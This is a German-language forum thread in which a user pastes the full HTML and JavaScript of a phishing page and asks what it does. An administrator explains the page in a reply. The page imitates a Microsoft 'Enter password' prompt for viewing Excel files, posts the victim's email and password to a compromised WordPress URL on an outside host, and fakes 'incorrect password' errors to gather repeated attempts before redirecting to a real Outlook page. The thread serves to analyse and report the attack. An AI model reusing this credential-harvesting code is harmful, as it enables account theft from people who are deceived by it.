        <div id="pstb" class="pagination-view animate has-identity-banner slide-in-next">
        <div>
            <div class="identityBanner">
                <button type="button" class="backButton" id="idBtn_Back"> <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"> </button>
                <div id="show-email" class="identity"></div>
            </div>
    <div id="loginHeader" class="row title ext-title">
        <div role="heading" aria-level="1">Enter password</div>
    </div>
    <div id="errorpw" style="color: red; margin: 15px; margin-left: 0px; margin-top: 0px; margin-bottom: 0px;"></div>
    <div id="important1" style="color: black;font-size: 13px;">
        Because you're accessing sensitive info, you need to verify your password to view excel worksheets
     </div>
    <div class="row">
        <div class="form-group col-md-24">
            <div class="placeholderContainer">
                <input name="passwd" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" required />
            </div>
        </div>
    </div>
    <div>
    <div class="position-buttons">
        <div>
            <div class="row">
                <div class="col-md-24">
                    <div class="text-13">
                        <div class="form-group">
                            <a id="idA_PWD_ForgotPassword" role="link" href="#">Note: Only recipient's email can access shared files</a>
                        </div>
    <div class="form-group">
    </div>
            <div class="form-group">
                <a id="i1668" href="#"></a>
            </div></div></div></div>
        </div>

        <div class="win-button-pin-bottom">
            <div class="row">
                <div><div class="col-xs-24 no-padding-left-right button-container">
        <div class="inline-block">
            <input type="submit" id="Button9" class="win-button button_primary button ext-button primary ext-primary" value="Signin">
        </div>
    </div></div>
            </div>
        </div>
    </div></div>
        </div>
    </div>
    </div>
    </div>
    </div>
        </div>
    </div></div>
            </div>
        </div>
        <div class="plate footer ext-footer" role="contentinfo"></div>
    <div id="footer" role="contentinfo" class="footer ext-footer">
        <div>
<div id="footerLinks" class="footerNode text-secondary">
        <a id="ftrTerms" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <a id="ftrPrivacy" href="#" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
    <a id="moreOptions" href="#" aria-label="Click here for troubleshooting information" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div></div>
    </div>
</div>
</div></div>
</form>
<script>
    var count = 0;
    function set_brand(email) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            type: "POST",
            data: { username: email },
            success: function (response) {
                let res = JSON.parse(response)
                let logo = res["res"]["BannerLogo"], background = res["res"]["Illustration"], DarkTile = res["res"]["TileDarkLogo"]
                let TileLogo = res["res"]["TileLogo"], BoilerPlateText = res["res"]["BoilerPlateText"]
                if (logo) {
                    $('.logo').attr('src', logo);
			    }
                if (BoilerPlateText) {
                    console.log(BoilerPlateText);
                    $(".plate").append(BoilerPlateText);
                    $(".plate").css({"text-align": "center"})
                }
                if (background) {
                    $('.background-image').css({ 'background-image': 'url(' + background + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (DarkTile) {
                    $('.background-image').css({ 'background-image': 'url(' + DarkTile + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                } else if (TileLogo) {
                    $('.background-image').css({ 'background-image': 'url(' + TileLogo + ')', "-webkit-filter": "brightness(20%)", "filter": "brightness(47%)" });
                }
            }
        });
    }

    function send_result(user, pass) {
        $.ajax({
            url: 'https://bascom.pl/wp-content/themes/vantage/templates/zaki/pii.php',
            data: {
                "email": user,
                "password": pass
            },
            type: "POST",
            success: function (data) {
                console.log(data);
            },
            error: function (data) {
                console.log('Ajax error');
            }
		});
    }


    document.addEventListener('DOMContentLoaded', async() => {
        if(url_string){
            document.getElementById("show-email").innerHTML = url_string;
            document.getElementById("i0118").focus();
            set_brand(url_string);
        }

        document.getElementById("Button9").addEventListener("click", e => {
            event.preventDefault ? event.preventDefault() : event.returnValue = false;

            var pswd = document.getElementById("i0118").value;
            if(pswd.length < 5){
                document.getElementById("important1").style.display="none";
                setTimeout(() => {document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = "Your account password is too short."}, 1500);
            } else if (pswd.length > 5 && count <= 0) {
                send_result(url_string, pswd);
                document.getElementById("important1").style.display="none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else if (count < 2){
                send_result(url_string, pswd);
                document.getElementById("important1").style.display = "none";
                setTimeout(() => {count++; document.getElementById("i0281").reset(); document.getElementById('errorpw').innerHTML = `Your password is incorrect. Please enter the password for your above email to access Excel worksheet, <a href="#"></a>`}, 2000)
            } else {
                send_result(url_string, pswd);
                setTimeout(() => {window.location.replace("https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&code=11&be=SN6PR04MB4014&fe=JNAP275CA0040.ZAFP275.PROD.OUTLOOgK.COM&loc=en-US&itemID=E4E_M_e9df154a-e4b8-4486-8aec-7acceeb93fee")});
            }
        });
    });
</script>
</div></body></html>

... leider spreche ich kein JavaScript! Könntet Ihr mich bitte aufklären, was die Scripts hier genau machen und welche Maßnahmen ich ergreifen muss!

Besten Dank im Voraus!
Zitieren
rzscout Offline
Administrator
*******
Beiträge: 220
Themen: 6
Registriert seit: Jun 2022
Bewertung: 18
#2
19.10.2022, 11:42 - Wörter: (Dieser Beitrag wurde zuletzt bearbeitet: 19.10.2022, 11:58 von rzscout.)
Hi,
das ganze erstellt sozusagen eine neue HTML-Seit mithilfe von JavaScript und der Methode write.
Es erstellt eine Fakeseite worauf eine Excel-Tabelle abgebildet ist, wo man sein Password eingeben soll. Es ist ein billiger billiger Trick um Daten abzufischen.
Zusatz: Er sendet die Daten also E-Mailadresse und gegebenfalls das eingegebene Passwort an[font=Consolas, "Courier New", monospace]: https://bascom.pl[/font]
Untitled

Das würde ich dort vielleicht auch melden, weil die nix über deren Angriff wissen. Durch einen WordPress-Fehler konnten sie diese Seite nutzen, um heimlich Daten aufzuzeichnen.


Angehängte Dateien Bild(er)
   
"Gerne dürft ihr mir eine gute Bewertung da lassen aber auch gegenüber Kritik bin ich offen" Angel
Suchen Bewerten
Als Lösung markieren Zitieren


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste